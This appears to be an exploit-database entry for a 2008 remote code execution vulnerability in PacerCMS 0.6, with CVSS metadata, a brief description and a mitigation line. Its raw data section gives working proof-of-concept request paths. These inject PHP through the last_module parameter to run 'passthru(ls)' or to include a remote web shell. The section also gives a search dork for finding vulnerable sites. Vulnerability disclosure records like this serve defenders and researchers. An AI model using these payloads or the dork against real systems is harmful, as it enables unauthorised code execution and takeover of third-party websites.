header-logo
Suggest Exploit
vendor:
PacerCMS
by:
TrYaGi
9.3
CVSS
HIGH
Remote Code Execution
94
CWE
Product Name: PacerCMS
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: Yes
Related CWE: N/A
CPE: a:pacercms:pacercms:0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability

PacerCMS 0.6 is vulnerable to remote code execution. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. The request should contain a malicious payload in the last_module parameter. The payload should be URL-encoded and should be of the form t{};%20class%20t{};passthru(ls);// or t{};%20class%20t{};include(URL-SHELL);//. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of PacerCMS.
Source

Exploit-DB raw data:

### PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability
### Script : http://ovh.dl.sourceforge.net/sourceforge/pacercms/pacercms0.6.zip
### Dork : Powered by PacerCMS
### POC :
###     /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###     OR INCLUDE SHELL
###     /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
###  I'm TrYaGi ......:)

# milw0rm.com [2008-02-10]

Navigation

Suggest Exploit

Services By CQR